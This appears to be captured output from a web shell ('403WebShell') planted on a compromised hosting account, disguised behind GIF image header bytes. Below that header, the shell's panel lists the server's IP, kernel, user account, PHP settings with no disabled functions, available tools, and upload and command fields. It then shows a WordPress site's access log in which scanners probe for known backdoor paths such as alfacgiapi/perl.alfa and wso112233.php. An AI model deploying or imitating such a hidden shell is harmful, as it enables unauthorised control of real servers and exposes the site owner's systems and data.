GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.82
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhalid/./access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhalid/.//access-logs/dangroupsa.maxsym.co-ssl_log
66.29.146.47 - - [13/Jul/2025:08:13:13 -0400] "POST /wp-cron.php?doing_wp_cron=1752408793.3383240699768066406250 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
136.243.228.194 - - [13/Jul/2025:08:13:00 -0400] "GET /items/qytis27/18023?key=deeply HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:13:09 -0400] "GET /themes.php HTTP/1.1" 200 0 "-" "-"
45.138.16.130 - - [13/Jul/2025:08:13:26 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 200 135 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.138.16.130 - - [13/Jul/2025:08:13:26 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 200 134 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.138.16.130 - - [13/Jul/2025:08:13:26 -0400] "POST /wp-plain.php HTTP/1.1" 200 135 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.138.16.130 - - [13/Jul/2025:08:13:27 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 200 134 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.138.16.130 - - [13/Jul/2025:08:13:27 -0400] "GET /jltxofbb.php?Fox=d3wL7 HTTP/1.1" 200 135 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.138.16.130 - - [13/Jul/2025:08:13:27 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 200 135 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
136.243.228.194 - - [13/Jul/2025:08:13:16 -0400] "GET /34onhtu41697.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
45.138.16.130 - - [13/Jul/2025:08:13:26 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
47.82.60.13 - - [13/Jul/2025:08:13:31 -0400] "GET /items/qkdob13/1963?key=distract HTTP/1.1" 301 0 "https://www.dangroup.sa/items/qkdob13/1963?key=distract" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:13:25 -0400] "GET /ini.php HTTP/1.1" 200 0 "-" "-"
45.138.16.130 - - [13/Jul/2025:08:13:33 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
47.82.60.2 - - [13/Jul/2025:08:13:33 -0400] "GET /items/cpjjh152/14232?key=recognize HTTP/1.1" 404 23128 "https://dangroup.sa/items/cpjjh152/14232?key=recognize" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
136.243.228.194 - - [13/Jul/2025:08:13:31 -0400] "GET /items/kxzre131/18317?key=sake HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
47.82.60.13 - - [13/Jul/2025:08:13:35 -0400] "GET /items/qkdob13/1963?key=distract HTTP/1.1" 404 23128 "https://www.dangroup.sa/items/qkdob13/1963?key=distract" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
45.138.16.130 - - [13/Jul/2025:08:13:42 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
13.79.243.123 - - [13/Jul/2025:08:13:40 -0400] "GET /as.php HTTP/1.1" 404 23128 "-" "-"
114.119.139.42 - - [13/Jul/2025:08:13:40 -0400] "GET /en/2024/06/ HTTP/1.1" 200 24170 "https://dangroup.sa/en/how-to-create-your-purpose-filled-career-comfortable-clothes/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
45.138.16.130 - - [13/Jul/2025:08:13:50 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
136.243.228.194 - - [13/Jul/2025:08:13:49 -0400] "GET /items/nvomy224/16146?key=well-known HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:13:53 -0400] "GET /shell.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:13:59 -0400] "GET /ws.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:13:59 -0400] "GET /items/rdcbm216/42170?key=lifetime HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
66.29.146.47 - - [13/Jul/2025:08:14:15 -0400] "POST /wp-cron.php?doing_wp_cron=1752408855.0420060157775878906250 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
20.171.207.193 - - [13/Jul/2025:08:13:59 -0400] "GET /295pkmnc45938.html HTTP/1.1" 404 23127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
47.82.60.22 - - [13/Jul/2025:08:14:00 -0400] "GET /items/vawva298/7060?key=distinguish HTTP/1.1" 404 23128 "https://dangroup.sa/items/vawva298/7060?key=distinguish" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.60.49 - - [13/Jul/2025:08:14:16 -0400] "GET /items/cqxhp295/48715?key=honey HTTP/1.1" 301 0 "https://www.dangroup.sa/items/cqxhp295/48715?key=honey" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.60.76 - - [13/Jul/2025:08:14:07 -0400] "GET /items/wwxfu235/11799?key=eventually HTTP/1.1" 200 0 "https://dangroup.sa/items/wwxfu235/11799?key=eventually" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.60.46 - - [13/Jul/2025:08:14:03 -0400] "GET /category/643_2097_22542/1/listing HTTP/1.1" 404 23128 "https://dangroup.sa/category/643_2097_22542/1/listing" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:14:09 -0400] "GET /makeasmtp.php HTTP/1.1" 200 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:14:12 -0400] "GET /81nfpg21184.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
52.167.144.225 - - [13/Jul/2025:08:14:29 -0400] "GET /gcompui18297bentrechats HTTP/1.1" 200 17 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
47.82.60.49 - - [13/Jul/2025:08:14:20 -0400] "GET /items/cqxhp295/48715?key=honey HTTP/1.1" 404 23128 "https://www.dangroup.sa/items/cqxhp295/48715?key=honey" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:14:25 -0400] "GET /wp-sigunq.php HTTP/1.1" 404 23126 "-" "-"
47.82.60.51 - - [13/Jul/2025:08:14:25 -0400] "GET /items/xxvqe220/29202?key=muscle HTTP/1.1" 404 23305 "https://dangroup.sa/items/xxvqe220/29202?key=muscle" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
66.249.68.129 - - [13/Jul/2025:08:14:39 -0400] "GET /items/dddbp166/21776?key=connection HTTP/1.1" 200 86912 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
136.243.228.194 - - [13/Jul/2025:08:14:29 -0400] "GET /137trvki42982.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
47.82.60.56 - - [13/Jul/2025:08:14:31 -0400] "GET /pcmypage?callback=product/review/hcvalor-eshop-trusco-6344146 HTTP/1.1" 404 23128 "https://dangroup.sa/pcmypage?callback=product/review/hcvalor-eshop-trusco-6344146" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:14:38 -0400] "GET /wso112233.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:14:44 -0400] "GET /261unu29280.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:14:50 -0400] "GET /fw.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:14:53 -0400] "GET /131hzsj58234.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:14:54 -0400] "GET /install.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:14:58 -0400] "GET /wp-login.php HTTP/1.1" 200 3129 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:14:58 -0400] "GET /items/itroc278/44242?key=diagnose HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
204.12.252.98 - - [13/Jul/2025:08:15:03 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "https://dangroup.sa/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
13.79.243.123 - - [13/Jul/2025:08:14:59 -0400] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 404 23128 "-" "-"
114.119.166.166 - - [13/Jul/2025:08:15:04 -0400] "GET /ar/work HTTP/1.1" 301 0 "https://danevnt.com/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
20.171.207.193 - - [13/Jul/2025:08:15:01 -0400] "GET /123yftzt45714.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:15:04 -0400] "GET /chosen.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:05 -0400] "GET /225nlo43840.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
114.119.166.166 - - [13/Jul/2025:08:15:06 -0400] "GET /en/work/ HTTP/1.1" 200 23889 "https://danevnt.com/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
13.79.243.123 - - [13/Jul/2025:08:15:11 -0400] "GET /inputs.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:12 -0400] "GET /257jmyzk42890.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
66.29.146.47 - - [13/Jul/2025:08:15:17 -0400] "POST /wp-cron.php?doing_wp_cron=1752408917.5379190444946289062500 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
13.79.243.123 - - [13/Jul/2025:08:15:16 -0400] "GET /classsmtps.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:21 -0400] "GET /wp-blog-header.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:21 -0400] "GET /wp-trackback.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:21 -0400] "GET /wp-signup.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:21 -0400] "GET /wp-comments-post.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:22 -0400] "GET /wp-cron.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:22 -0400] "GET /wp-load.php HTTP/1.1" 403 1242 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:22 -0400] "GET /wp-mail.php HTTP/1.1" 403 1242 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:18 -0400] "GET /184jvb40845.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:22 -0400] "GET /edit.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:26 -0400] "GET /wp-activate.php HTTP/1.1" 403 1242 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:24 -0400] "GET /189pnr18468.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:26 -0400] "GET /plugins.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:30 -0400] "GET /items/lqnzv55/44115?key=melt HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:30 -0400] "GET /post.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:36 -0400] "GET /wp-content/plugins/pwnd/block-support.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:36 -0400] "GET /items/kvvlh241/44327?key=requirement HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:40 -0400] "GET /about/function.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:42 -0400] "GET /271loli9160.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:44 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:15:55 -0400] "GET /wp-content/themes/index.php HTTP/1.1" 200 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:15:50 -0400] "GET /items/qjkwt241/5961?key=brush HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:15:55 -0400] "GET /goat1.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:16:04 -0400] "GET /classwithtostring.php HTTP/1.1" 404 23128 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:16:04 -0400] "GET /160onkg25103.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
